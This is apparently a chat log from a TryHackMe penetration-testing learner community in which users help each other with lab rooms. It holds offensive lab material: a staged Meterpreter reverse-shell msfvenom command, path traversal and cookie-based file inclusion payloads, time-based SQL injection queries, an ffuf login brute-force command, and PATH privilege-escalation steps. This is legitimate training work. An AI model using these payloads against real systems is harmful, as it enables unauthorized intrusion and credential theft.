- sudo apt install seclists
All of that should already be pre-installed on Kali 🙂
Right, I'll do that, because I had some issues at the installation, so I am missing some things.
What about the wordlists, those come as well?
Some do . You can install seclists pack with
sudo apt install seclists
cool, thanks a lot!
Is there someone that can help with the file inclusion room?
what's the issue 🙂 ?
For the challenge flag 2. I’ve sent you a message directly
Is the entry point the url or cookie itself or something different all together. I tried direct messaging ya as well
cookie
Running into same type of issue with flag3. Is the request part of the url or am I barking up the wrong tree
Hello can anyone tell me , from which machine should I start solving to learn windows privesc except Blue machine , I already solved some linux machines , now I wanna learn windows so as a beginner what machine should I start?
I would recommend this one 🙂
https://tryhackme.com/room/windowsprivesc20
Hello everyone. Is anyone interested in taking the jr pentester path? I have completed it, but would like to do it again to go over the topics well and prepare for PT1
That is a good idea 🙂
If you already completed then u should try to solve machine it will give you more practical knowledge.
Sorry to ask again but I meant ctf type windows machine not walkthrough also I already did blue so what next .
Have you checked out windows ad exploitation module ?
No what's the name of the module?
Ok but first I need to learn basic windows exploitation then I can move further to learn AD and that's why I asked you to tell me some ctf type windows machine as I already completed the Windows PrivEsc, now I want to do practice and test my knowledge.
Everything that you need is in path above 🙂
Ok i'm doing Offensive Pentesting Path , there is everything what I need as a beginner. Thanks
What is your full cmd ?
Helo, friendz!
Does anyone who's doing this path want to join in some meetings like 30 mins/day and share knowledge about what we accomplished during our journey ?
Since the most valuable method of gaining information is by teaching others, we can try that also combined with this discussion group and learn-by-actual-doing-on-labs ?
Also if someone is looking forward to join me as a team and try the impossible in a real target like a low hanging fruit (for the beginning) Bug Bounty program it would be great!
Please let me know !
Here I am, but before taking part in a real bug bounty program, I would like to get the PT1 certification.
I’m going through the Junior Pentester path again to reinforce the concepts.
It is not the right approach. Just text me in private. Everything is possible. I have only 2 months of an ethical hacking internship and found an XSS, a self XSS with no impact but, I mean, it is something, it is a motivation to keep moving forward. We should do the labs on platform but in parallel pick a real target, master your recon, face problems.
And when do this in team it becomes even more exciting..
That’s so true — sharing ideas and solving problems together is the best part!
Yeah
It is scientifically proven that teaching others, learning by doing and group discussions are the best ways to learn, to retain information
The lowest ones are the lecture and visual/audio stuff
Which are also good when you are in the park, or in the countryside at your grandparents' house, when relaxing in general
That is called passive learning
Subject: Flag Submission Issue in 'Walking An Application' Module - Flag 4
Message Body:
Hello TryHackMe Team / Community,
I am currently working on the "Walking An Application" module and encountering an issue when attempting to submit the fourth flag (Flag 4) from the "Viewing the page source" section.
The expected flag is THM{CHANGE_DEFAULT_CREDENTIALS}.
However, when I try to enter it into the text field, the system seems to add unwanted spaces or prevent the flag from being completed correctly. This prevents me from submitting it and thus, I cannot progress with the exercise. In the input field, the flag appears as THM{CHAN_GEDE_FAULTCRE_DENTIAL }, with spaces and characters that do not match the original flag for the exercise.
I would greatly appreciate your help in resolving this issue so I can complete the task.
Thank you in advance for your time and assistance.
Best regards
That's not the correct framework flag , that flag is for another room . Check out page's source code to find out framework page > Go to the page and inspect recent commits 🙂
Thank you, I could do it, but it is confusing. 
Is there a way I can learn..without spending on subscriptions? Because most rooms Im doing in the roadmap is paid..
Go to this page and select free roadmap
https://tryhackme.com/hacktivities/
You can see a complete list of free rooms on the link below 🙂
https://tryhackme.com/hacktivities/search?page=1&contentSubType=free
In the RaceConditions room: Task 7 - I am unable to transfer funds, I made sure proxy and all were off but this thing does not seem to be working and yes this account has 100 usd so it has no reason to fail or keep spinning while transferring..
Can anyone please help , I think the website is broken .. 😦
yesterday i have completed this room, it was working fine. try restarting...
Restart the machine. Also important to note: the account that is receiving only updates after you log off it and log back in, if you have it open in parallel to the account sending
I honestly didn't know this had been packaged, I've been hunting them down on github all this time 😂
Got it to work bro thanks 👍🏻
Thanks for the help
can I start the Jr pentester path directly by skipping cybersecurity 101? I have completed pre-security path
Definitely don't do that . If you skip fundamentals from Cyber101 you won't get far with Jr.Pentester path . Definitely go with Cyber101 before any other path
Thanks.....on it
I'm still on Cybersecurity 101, taking the #pentester path, how can I start creating a portfolio?
Exactly what kind of portfolio would you wanna start?
This is great advice. @split basin I did pre-security and cybersecurity 101 in less than 40 days, each day only doing 1-2 hours a day
@wary walrus I am in the same task!
Great job 🙂 🚀
found a weird issue while testing

I'm not taking this path for the cert, just to learn. Do y'all think I could skip the Burp Suite module and come back to it at the end? I started using it in the web hacking module and it's pretty straightforward
isn't this incorrect?
Definitely don't do that . Burp is a fundamental tool , you will use it a lot as a pentester 🙂
Why do you think that it is incorrect ?
Cause Sniper does it sequentially not simultaneously
What command would you use to generate a staged meterpreter reverse shell for a 64bit Linux target, assuming your own IP was 10.10.10.5, and you were listening on port 443? The format for the shell is elf and the output filename should be shell
What Task do you need it for?
What the Shell?
msfvenom
What the Shell?
msfvenom
Do you really want the Solution or do you want a hint and find it yourself since that way you understand it better
give me the solution i have been stuck here for hours
ok
should be along the lines of: msfvenom -p linux/x64/meterpreter/reverse_tcp -f elf -o shell.elf LHOST:10.10.10.5 LPORT:443
incorrect
it says
What command would you use to generate a staged meterpreter reverse shell for a 64bit Linux target, assuming your own IP was 10.10.10.5, and you were listening on port 443? The format for the shell is elf and the output filename should be shell isnt that is what the question asking us
remove the .elf from -o shell.elf
so it looks like this: msfvenom -p linux/x64/meterpreter/reverse_tcp -f elf -o shell LHOST=10.10.10.5 LPORT=443
nah its still not working
Is it saying wrong or unknown error occurred? since that is the solution I have in the task
Cus if it is unknown error you need to reload the page
Did it work by now?
Strange. This should be the correct answer, as @fierce forge writes
msfvenom -p linux/x64/meterpreter/reverse_tcp -f elf -o shell LHOST=10.10.10.5 LPORT=443
I just finished the first nmap room so I'm not too far ahead of you
Congrats , keep up the good work 🙂 🚀
Anyone knows why gobuster and ffuf are lightning quick, but dirb takes forever?
dirbuster? idk
to me gobuster is actually slow
I use dirsearch
dirb Usage Example
Scan the web server (http://192.168.1.224/) for directories using a dictionary file (/usr/share/wordlists/dirb/common.txt):
root@kali:~# dirb http://192.168.1.224/ /usr/share/wordlists/dirb/common.txt
DIRB v2.21
By The Dark Raver
START_TIME: Fri May 16 13:41:45 2014
URL_BASE: http://192.16...
It's one of the tools in the attack box for the early pentester rooms. I installed and ran all three on my local system via VPN. Gobuster and ffuf were pretty fast, but dirb took ages. I thought it was due to the other two being developed in go, but then it seems dirb was coded in C, so I'm at a loss. The difference in performance is brutal.
I'm having issues with this question, it's saying too many fingerprints on that host so it can't give os version
I can't upload the question but it's on netsec challenge about FTP nonstandard port listening
We have an FTP server listening on a nonstandard port. What is the version of the FTP server?
Perform nmap scan with -p- flag set
ohhh, dirb, I don't use dirb so 🤷♂️
hi all, I couldn't get the result in Nmap Basic Port Scans Task 6 UDP scan. is it because UDP is connectionless without handshake + poor connection packet dropped? I tried connecting via different VPN servers (AU's and US's), changed the default -T3 to -T4 (didn't want to slow it down). Try it many times and couldn't get the result. Please let me know if I have done anything wrong. thanks a lot!
└─$ sudo nmap -sU -F -v 10.10.129.48
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-20 00:42 EDT
Initiating Ping Scan at 00:42
Scanning 10.10.129.48 [4 ports]
Completed Ping Scan at 00:42, 0.39s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 00:42
Completed Parallel DNS resolution of 1 host. at 00:42, 0.01s elapsed
Initiating UDP Scan at 00:42
Scanning 10.10.129.48 [100 ports]
Increasing send delay for 10.10.129.48 from 0 to 50 due to max_successful_tryno increase to 4
Increasing send delay for 10.10.129.48 from 50 to 100 due to max_successful_tryno increase to 5
Increasing send delay for 10.10.129.48 from 100 to 200 due to max_successful_tryno increase to 6
Increasing send delay for 10.10.129.48 from 200 to 400 due to max_successful_tryno increase to 7
Discovered open port 111/udp on 10.10.129.48
UDP Scan Timing: About 45.67% done; ETC: 00:43 (0:00:37 remaining)
Increasing send delay for 10.10.129.48 from 400 to 800 due to 11 out of 23 dropped probes since last increase.
Completed UDP Scan at 00:43, 104.44s elapsed (100 total ports)
Nmap scan report for 10.10.129.48
Host is up (0.32s latency).
Not shown: 98 closed udp ports (port-unreach)
PORT STATE SERVICE
68/udp open|filtered dhcpc
111/udp open rpcbind
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 104.96 seconds
Raw packets sent: 262 (16.915KB) | Rcvd: 114 (9.228KB)
Could it be you still had a machine running of the previous tasks instead of the one from task 6?
i just tried again and started the task 6 machine. the result is the same.
let me try it, one sec
i just did it after seeing your question
working fine for me
I am not sure why it didn't work for me and I will just move on...
similar thing happened to me in the linux priv module
tried 3-4 times but didn't work
thanks for looking into this @knotty bloom and @rancid lotus.
oh wait, I didn't try it yet 🤣
one sec
got busy
anytime brother
I'm pretty sure the reason is that you must run the scan from the Attackbox. That's why the task specifically mentions:
"Launch the VM. On the AttackBox, use the terminal to execute..."
If I run the scan from my own Kali I have the same issue as you. If I run it from the Attackbox the new UDP port shows up.
don't think so
i used the openvpn to connect first and then ran the scan from my system
doesn't need to be from the attack box only
then the thing is just being flaky 🤷♂️
I just completed nmap01
this room with host discovery is amazing!
is there any group that would like to have one person for the upcoming ctf? I don't have one group and don't want to join alone
#1385308722225483926 Here 🙂
awesome thanks!
doing this, is not working, so I added -p143, and got the results back, wondering why would they ask for 143 if only port 111 came back with results
What doesn't work here ?
the port scan works, but I am trying to understand why the port 143 isn't on the first scan
add -p- to your first cmd to scan all ports
so, not always I need to run the exact commands from thm, but instead add more context?
Well it depends , sometimes yes it may need some additional settings
looking at other threads in this discord, people have different opinions as to why it didn't happen
I'll suggest you don't try to understand every error, to save you the time and the headache
You will always encounter errors that you won't know what the cause is and that's fine
Programs are not meant to be overly perfect
The port might also be protected by a firewall or the service, idk
Just think this might also be the case
yeah make sense. I guess, looking at other threads, the --version-light might be fast and not come back with results that you want
with -all
Yes, I think the "-light" flag is for speed
Your initial scan scans only the most common ports , port 143 may not be included there
Yes, this flag gives more verbose output
Maybe it was in the older version of nmap when the room came out that's why it may be missing from the hint
I see, interesting, I will suggest to review it in the comments section
linux priv capstone challenge was pretty fun, just finished it
wrote my first ever writeup, looking for feedback 
should it be more detailed or uhm is it fine, what can be improved
You can post your writeup in #thm-community-media channel 🙂
oooh okay!
Job seeker portfolio.
yea but how exactly do u wanna start a pentesting portfolio? This isnt webdev lmao
Do CTFs etc.
Have a look at https://secbook.in
And let me know how it is
Also let me know if you have any suggestions and improvements I can make to my portfolio.
I have some feedback for room https://tryhackme.com/room/authenticationbypass
On task 3, we are given a ffuf command to run to try to brute force the login page. But the syntax does not work on a new version of ffuf installed on a local machine (I have not tested on the attack box).
The syntax given is
user@tryhackme$ ffuf -w valid_usernames.txt:W1,10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.102.3/customers/login -fc 200
But the two word lists need to be entered with their own -w flag:
ffuf -w valid_usernames.txt:W1 -w 10-million-passwords-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.102.3/customers/login -fc 200
don't think so, I did on my system as well and the first command ran without any problem
it's version 2.1.0
Thanks, I should have checked the tags on the repo. I just used the version on apt install, which seems hasn't kept up to date.
I got a new phone, a few weeks ago. Haven't been on try hackme for months, recently joined the discord community. I'm having trouble recovering my old account....damn
What is the problem exactly ?
@violet brook goodmorning, I don't remember my password
Try to reach out to Discord's support , they can probably help you recover it 🙂
@violet brook I'll give it a go, thanks.
@violet brook if you don't mind, what does the sword, THM and the blue shield next to your name mean?
Blue shield indicates that I am a moderator , sword is a server tag for THM's server . You can also obtain it in your account settings 🙂
finished!
Congrats , great job , keep it up 🙂 🚀
thankss
@rancid lotus congratulations!!!
thankss!!
congrats!
I am having too much fun with this room /exploitingavulnerabilityv2
I even changed one of the pictures for change password, admin, admin is not secure 😄
ohh nice
@violet brook is it normal that reverse shells don't work on some of the targets machines? for example, I just tried different reverse shells after gaining RCE (Capstone, Fuel CMS) and none of them worked, similarly with (exploitingavulnerabilityv2) or is it just me, I am so noob lol. Although I managed to host the shell, make target download it and run it
Well that depends on a lot of factors. I can tell you much without knowing full context
@violet brook hello, I have a question about race condition vulnerability, if a hacker attacks and accesses someone's bank account and finds an amount like 10$, can he transfer that 10$ in parallel to his account and it becomes 100$ for example ?
because I just did the race condition room and I want to understand if this is the concept of the exercise
Well , theoretically yes but that depends exactly on how the app is coded and how exactly it functions . Many modern apps/frameworks are hardened against this vulnerability 🙂
OK, thanks for the clarification 🙂
Finished the path a couple days ago, any recommendations for challenge rooms to solidify the gained knowledge
This one is a good choice 🙂
https://tryhackme.com/room/smol
Imma take a look into it thank you
Can't access the site of the vulnerable machine, is that intended or broken?
wdym ?
When I try to access the vulnerable site via browser on the AttackBox to have a look at the WordPress site the IP redirects to "http://www.smol.thm/" which then doesn't load
Well you need to add that domain and subdomain to /etc/hosts
@fierce forge congratulations! What was the most challenging about that path for you, and an eye opener?
ahhh! could not run this reverse shell and it was driving me crazy! all I had to do was assign chmod +x rights and then cronjob gave me a root shell! room//linprivesc
so for room//linprivesc, task 11, the GCC of my linux was higher thus giving errors, if anyone comes across this, try gcc -static nfs.c -o nfs
#room-help ask here
Hi bro, I have completed this challenge. Can you recommend any similar Linux privilege escalation machines? I need more machines.
Try this one 🙂
https://tryhackme.com/room/silverplatter
OK, I may need you to recommend some more after I finish~~
I think the most challenging was the Cross Site Scripting part together with the SQL Injection
It was nice run!
congrats! 👏
Thanks
what's your next focus on?
Maybe red Teaming
Congrats , great job , keep it up 🙂 🔥 🚀
Ty for you all your help and support!
I have finished it, please recommend me a new room~
about what ?
Still Linux privilege escalation.
Both paths and challenges can
This one
https://tryhackme.com/room/mkingdom
ok
Hello, i sent a direct message to you.
Hi
I am trying to figure out the first Challenge to read /etc/flag1
I tried changing the Request method to POST and forward the packet via Burp Suite and received an error that the file doesn't exist
I tried different paths including /etc/flag1 and with dot-dot method to find the root directory, but none of them worked so far
Can you please give me a hint? what am I missing here
How did you change the method ?
By right clicking on the packet and selecting Change Request method option
What's your response ?
Also send this to repeater and disable intercept
I got the response as the file doesn't exist and I think the chall1.php is taken as the requested file
Okay I will try that
Would this be the right way?
Why do you have dangling ? in URL ?
It was there by default so I thought it might be needed to indicate the query string
Should I remove it?
Yeah
When the intercept is off, should I disable the Foxyproxy too?
And should I check the response on the browser itself or under the Response tab of the Burp Suite?
Check responses tab
Same response here
Try ordinary instead of nested sequence
../../../../etc/flag1
Worked, thanks!
For the 3rd challenge, shouldn't this URI work?
chall3.php?file=....//....//....//....//%2Fetc%2Fflag%00
OR
chall3.php?file=../../../../%2Fetc%2Fflag%00
Try to specify flag3 instead of just flag
I tried this too, but I got the same error: chall3.php?file=../../../../%2Fetc%2Fflag3%00
Can you provide a shot of request
Sure
Hello everyone! - Room: Linux Priv Esca - task 9 - cronjob - I exploited backup.sh with success. I am trying to exploit /tmp/test.py, right now. Is it exploitable? Thank you.
You should focus on backup.sh , make sure not to forget to give +x permission to the script
@violet brook im looking to start HACKTHEBOX . Do you think jr pentester path is enough since HTB not that beginner friendly.
Yeah Jr.Pentester is a great path even recommend one for PT1 certification . It covers a lot of topics related to offsec
👍
Race-Bank-v0.1, not sure if this was mentioned before but im unable to finish the task, the vm is unable to keep up with the requests
ive reset it 3 times but no joy
Same here for the Relevant challenge. Been trying to run gobuster dir on it since yesterday, but the box keeps dying every time. Extremely frustrating and I haven't even increased the number of threads from the default 10

I have completed it. Please recommend similar rooms to me.
🆗
#attackbox-issues while using attackbox I can't access the http://MACHINE_IP
Well you need to change machine_ip placeholder with an actual IP 🙂
Hello,
I'm working on a room and encountered an issue. I replaced the MACHINE_IP placeholder with the actual IP address provided in the task, but I'm still getting the following error:
Error Code: 405
Message: Method Not Allowed
I've already restarted the machine and refreshed the page, but the error persists. Please help.
Thank you,
Abhishek Vishwakarma
Can you please verify and provide some screenshots ?
YES
i shared the screenshot in personal please check
Please verify and provide the shot here
how do i verify
I gave you the link above , follow those instructions
check and resolve my problem
Can you provide a shot of machine info box please 🙂 ?
screenshot of machine information it's located above the tasks
You haven't even started the machine
Go to task 1 and press green Start machine button
Wait 5 min for a machine to boot up and use that IP in your browser
Provide shot of machine info box
where can i find machine info?
above the tasks
Use http:// instead of https://
I just wanted to say thank you for your prompt help and support. I was facing an issue earlier, but with your guidance, I was able to resolve it successfully. I really appreciate the great work you do and the amazing platform you've built.
Keep up the good work 🙂 🚀
I am stuck on gaining root access on linux privilege escalation's last question. I believe PATH exploitation is the correct decision, but my executable for the compiled script isn't owned by root, so it's basically worthless
in the example for one of the sections, it seemed like compiling it created an executable file that was immediately designated execution by root only
does gcc need to have been configured in a very peculiar way to produce this result
oh they just had a test file on the machine in the beginning that i never compiled and was owned by root
Can you provide a room link ?
I'm having some trouble completing the Racing Condition room: https://tryhackme.com/room/raceconditionsattacks
On the last section it asks me to connect to port 5000 on the VM (whereas previous sections were using port 8080). I have been using the VPN with no trouble, but this time it came with an error (Unable to connect). I tried with and without the proxy.
I then started the Attack Box, but the same thing happens there. So the issue must be on the VM itself, or some network configuration. Anyone experiencing the same?
Never mind, I just figured out. In that room you need to terminate the previous machine and start a new one.
nvm I just did the same thing twice for two different flags
Can you provide a task number please?
Sorry, I just realized it’s the capstone challenge.
I used a different attack vector, but I’ll try the one you showed.
The script.c and path files were created, but they didn’t originally exist on the virtual machine.
To exploit PATH-based privilege escalation, you need an application that can potentially be hijacked to run a script owned by root with the SUID bit set.
The demo script in Task 10 is for demonstration purposes only and was compiled by the root user. The compiled binary (path) executes a file named thm.
To exploit it, you should create a custom Bash script with the same name as the file the binary tries to execute (thm), which runs /bin/bash. Save this script in a writable directory, then update the PATH environment variable to place your writable directory at the beginning. After that, run the vulnerable binary as a non-root user — it will execute your custom script with root privileges.
Try exploring another privilege escalation attack vector.
hello anyone available
if i follow this path should I go through the others?
You don't need to go through SOC path if you aren't interested in blue teaming 🙂
I think it’s worth knowing how blue team thinks/acts as a red teamer. It makes you think of ways to get in that they wouldn’t think of
I was just about to ask if SOC T1 knowledge wouldn't be useful in a Pentesting role. Thanks for pointing that out.
The best attackers are good defenders; and vice versa
Although true, if the goal is pentester, I’d focus on that module first. I agree blue skillsets are important and, as time permits, worthy of going through those modules too.
Hello everyone To what level would I need to know terminal before I can jump to learning python ?
Well you don't necessarily need to know terminal in order to start learning python
Oh frrrr?
I thought so
But for hacking I do though right
Yes
You at least need to know how to run your python code on a terminal
Would you suggest how to go about that?
like learning how to work on a terminal?
if you just learn the basics like navigating, catting a file, passing an argument to a program, running a program, easy stuff like that, it's enough.
just pop your Terminal and start typing, maybe watch YouTube
after that, you'll know in which route to go
I’ve been watching yk network chucks Linux playlist on yt
Just don’t know when to necessarily stop
I think that's enough to start learning python
I guess it's fine to finish the whole playlist. It's worth it
long ago
yeah
if you don't like to watch youtube, there are some rooms on THM. Also a lotta resources on the internet
anyway, imma go. Have fun learning
Having an issue with the authentication bypass portion, specifically the brute force part. On the left is the username file from the task before and I’m running the command on the right from the same directory the username file is saved but nothing is coming up. Is there something in the command I’m missing? Thank you!
Hi im doing the Challenge-Room "smol" since it was recommended to me after finishing this path. Problem im Facing is that i cant reach the Wordpress Site of the Challenge even after Adding it to /etc/hosts. Im prolly missing sth stupid but cant figure it out rn
You also need to add www.smol.thm to /etc/hosts
Thank you, but ouch forgetting the www was as Predicted stupid on my part 
SQL Injection Task 8.
Looking at Time Based SQL injection to enumerate a database.
So far I have gotten to
admin123' UNION SELECT SLEEP(2),2 FROM information_schema.columns WHERE table_schema = 'sqli_four' and table_name = 'analytics_referrers' and column_name like 'domain%';--
and
admin123' UNION SELECT SLEEP(2),2 FROM information_schema.columns WHERE table_schema = 'sqli_four' and table_name = 'analytics_referrers' and column_name like 'id%';--
Bit unsure where to go from here though
The room gave a hint to start the task off
referrer=admin123' UNION SELECT SLEEP(5),2 where database() like 'u%';-- however, the response was not sleeping and therefore I don't believe there is a database beginning with 'u'
the database might not start with u
Yh so far I have.
Database = 'sqli_four'
Table = 'analytics_referrers'
Columns = 'domain', 'id'
looking for study buddy while taking the jr pentester path thanks
Me too
Ahhh I have gone back and found another table, 'users'. This is probably what I am after
hi everyone, I wanted to ask, whats your opinion on this path ? is it good ? im currently doing it but I want to know a few opinions on it!
im on the path and i find it useful and found cybersecurity101 very helpful too but i doubt i wouldve been able to get through some of the rooms without youtube walkthroughs
It’s good. Having background knowledge helps but the rooms generally do a good job about explaining how to do the task with you having to read between the lines here and there. There is pretty much always a room that explains how to do your task whether it’s burpsuite or html or whatever
alr thanks !!
hello, I am doing the nmap basic port scans room, and as I arrived to the first task where i have to run a nmap command, I figured that when I run it on the attackbox i receive only 1 open port, but if I do it from my local machine (connected by VPN), it shows me what it should've shown me on the attackbox
it's not a problem of course as I dont really bother using my local machine, but still I would like to understand how it is possible ? since both machines (attackbox&my local machine) are scanning the same target ?
Are you connected to THM OpenVPN when doing the scans?
on my machine yes ofc if not I would not be able to scan the machine
and on the attackbox I'm supposed to be connected to it directly so ...
Just making sure. 😅
The Attackbox is already within or logically connected to the THM network where your target is hosted or running from (I say this as I don't have visibility on how it is setup). Your local machine is logically connected to the THM network through the OpenVPN connection where it establishes a tunnel between your home network to the THM network.
Yes as you are scanning the same machine from the same connected network
I think I just didn't run the command with "sudo" in front of it
but still I was with user "root" so I don't understand why I would need to use "sudo"...
I need help on lab6 in Local file inclusion:
”Try out Lab #6 and read /etc/os-release. What is the VERSION_ID value?”
The error says: access denied - allowed files at THM-profile only! I'm using the following command http://10.10.54.216/lab6.php?page=../../../../THM-profile/etc/os-release. but not able to see any version number.
ive also tried these with no success http://10.10.54.216/lab6.php?page=../../../../THM-profile/info.php
http://10.10.54.216/lab6.php?page=../../../../THM-profile/index.php
http://10.10.54.216/lab6.php?page=../../../../THM-profile/config.php
http://10.10.54.216/lab6.php?page=../../../../THM-profile/about.php
http://10.10.54.216/lab6.php?page=../../../../THM-profile/test.php
Add THM-profile base dir at the start of your payload

Hello im working on the same room i have used the following url but im not having any success. http://10.10.136.38/lab6.php?page=THM-profile/../../../etc/os-release
I changed the command to the following http://10.10.136.38/lab6.php?page=THM-profile/../../../etc/os-release with various number of ../ but im still not receiving any version id.
Delete everything before THM-profile
YEES!! Thank you!
In file inclusion room , task 8 , question 2 . i got the admin page , but i am not able to find flag, i checked in page source , response, and i also tried path traversal etc..
Try to play with cookies 🙂
thanks , i changed cookie value to ../../../../etc/flag2%00 i got flag
Great job , congrats 🙂 🚀 , keep up the good work 
hi boss am downloading this and what does it mean ? will i lose my internet password and then have to again add the password in order to use wifi or what does it mean ?
Net Sec Challenge
I need to "use Nmap to scan the machine IP as covertly as possible and avoid being detected by the IDS" all I can think of is a stealth scan using -sS. However this doesn't seem to do anything apart from tell me 5 open ports
Any hints/advice will be appreciated
Try with -sN scan
No it means you may temporary use internet connection during VBox installation since installation may need to use your network adapter 🙂
My os is windows 11 and before downloading the virtual box I selected the windows version now I want to download the iso file for kali Linux in order to use kali linux on it ?
Not sure what is even meant to happen. But same result with the -sN scan 🤔
Yes
Click on reset packet counter and repeat the scan
I got it to work on the attack box rather than my own VM. I did try resetting the packet counter after every attempt but for some reason still wasnt getting any results
Maybe you had some connection problem with your vm or an mtu issue
You're speaking above my current knowledge level but I appreciate the help either way 😅
If you dont mind then can you share the link for that ?
You have a complete official guide here
https://www.kali.org/docs/virtualization/install-virtualbox-guest-vm/
This guide is about virtualizing Kali Linux inside of VirtualBox, allowing you to have a Kali VM. This is a great way to use Kali, as it is completely separate from the host, allows you to interact with other VMs (as well as the host machine and other machines on the network), and allows you to revert to snapshots.
Hey guys!
I just started on the jr pentest path.
Been through the precyber and 25% of the cyber 101
In the file inclusion section i got through most of it (with help), but the very last challenge (The free playground ctf) i really couldn't do it.
I used a couple of youtube videos where i would serve a python server to get a RCE. https://www.youtube.com/watch?v=liH2wc6X2as
my problem is when i serve the python server it keeps saying the same mistake, it seems like in the other guys terminal they appear directly connected to THM in openvpn, and i am still on my on machine. Does it make sense?
Never mind. Yet again it is the smallest of the smallest mistake that got to me. Fixed it.
I was to use the attackbox ip and not my own terminal
Just wondering any reason why you skipped the rest of Cyber 101? Do you have pre-existing knowledge?
Tried to motivate myself with some pentest hands on task. I will go back to it, just needed a break
Fairs, it is a very long path tbh especially compared to pre-security
Exactly.
I just needed a breather and a feel of where this is going.
I was working on room SSRF and completed it, yet i still haven't really gotten grep of it. I tried to find similar online but didn't find exact methods as in tryhackme. Could somebody recommend a video or if you feel very generous explain in DM. Thanks! 🙃
Maybe Portswigger's topic on SSRF will provide you with more details
https://portswigger.net/web-security/ssrf
thanks! Where do you find all this info? or maybe it is just experience
google/chatgpt may help you when looking for some resources especially chatgpt
oh i see, cause i just asked chatgpt explain it ,not give sources. Well, now i know
Room "What the Shell?"
Currently working through the practice and examples to actually get hands on with some of the covered content.
I am trying to create a staged meterpreter shell. However when uploading the reverse shell .elf file to the website, it doesn't seem to connect back to my listener. When I try open the URL to the file I uploaded it just downloads the .elf file to my machine?
you know, if you really need an answer you can just paste the question in google and on medium post you will find an answer, although it doesn't explain it much
That the site that just gives walkthroughs? I've looked a couple times but like you say it never really explains their process
I'll have a deeper look later on, I've left it for now to watch football
Yes exactly. Honestly i haven’t figured out a good site to learn more deeply, but you can try Mitre, especially ATT&CK, portswigger that is yet the best i have
Hope it helps
Did you setup your multi/handler? Meterpreter payloads only work with the multi/handler and not with the likes of nc, socat.
Room : Burp suite - Repeater , Task 6. i added the flag and sent request , but i am not gettting any response (When i didn't change anything in request then i was getting response)
Disable intercept option in the proxy tab
i am currently on room "Race Conditions". on task 5 you need to make multiple requests in repeater to get a balance amount of 100 hundred. But i don't see what send method i should use, here available options :
Send group in sequence (single connection)
Send group in sequence (separate connections)
Send group in parallel
if you could explain why that is. Thanks!
nevermind. I got it
Send request to repeater put it in group with more than 20-30 requests and use last byte sync / parallel option to send it . Repeat it cross accounts and that's it 🙂 . Make sure that you don't send more than 30$-40$ in the initial transfer .
yeah thanks, already got it. that is crazy actually thing to do, like i see other methods like IDOR or SSRF but this one is fire
I have multi/handler set up and listening. My problem is I can't execute my uploaded shell.elf file. I can see it in /uploads but just opening it only downloads it to my machine rather than executing it
Hello guys, greetings. This is my first time sending a message here. So please forgive me if I'm doing or saying something I'm not supposed to say. I look forward to learning from you all. Thank you 🙇
Welcome 🙂
Feel free to reach out whenever you need help
Thank you 😊
if i bought an exam voucher, but have no time to complete and exam, is there a way to reschedule/refund an exam voucher?
Linux Privilege Escalation: SUID
The only binary with the SUID set that also appears on GTFOBins is base64. I have used this to read the shadow file to get the password hash for user2. But John the ripper isnt installed on the system for me to crack the hash. I also dont have privilege to nano or vim so I cant add a user to passwd either.
I looked at a walk-through and it seems they're using John through their own machine, but surely I can complete this task solely within the target machine? Any ideas on what I can try from here?
If it is in /uploads, then you should change it into php so the web server would "understand" the language
I suggest dropping an email to THM Support.
@cerulean tusk
Be sure that you use the correct machine that room has different machine for each task
why have i this problem with nmap ?
Which room ?
Basic port scan with nmap
You're probably using the wrong machine that room has 3 different machines , make sure to start the machine directly from that task
So instead of outputting the payload as an elf file I do -f php instead?
I'm using the corresponding machine for the task but it seems all I can do with base64 is read files. So I can gain the password hash but I need a way to crack this hash
Try to use hashes.com
That worked, forgot I could also use the web 🤦♂️ I was tunnel visioned on using commands only
I managed to also do it using John outside of the machine which now that I think about isnt even an unrealistic approach
I always first start on web for ctfs 🙂
Yes, as the target web server software doesn't understand or know how to read elf files.
Path completed onto SOC Level 1. Appreciate the support 🙏🏻
Great job , keep up the good work 🙂 🚀 🔥 💪
Hi new to here. I recently started learning this field using tryhackme as main source. honestly im loving what im doing but at the same time i sometimes feel overwhelmed by watching those really skilled pentester, ethical hacker and stuff feeling how do i even get there. did you guys go through where i am now? is it really abt consistency?
mostly yeah, you most likely never would know everything, updates and bugs drop almost everyday, so you need to learn where to find, try to understand why and how code breaks and don't forget to practice. Yeah, about consistency. Good luck!
To add on what has been mentioned, defining your methodology on how to do enumeration and research will help you throughout the learning process.
Hi , i am working the SQL injection lab, but at task 6 it is not accepting the flag presented as correct? This is for the Blind SQLi Authentication bypass
anyone?
What's your flag ?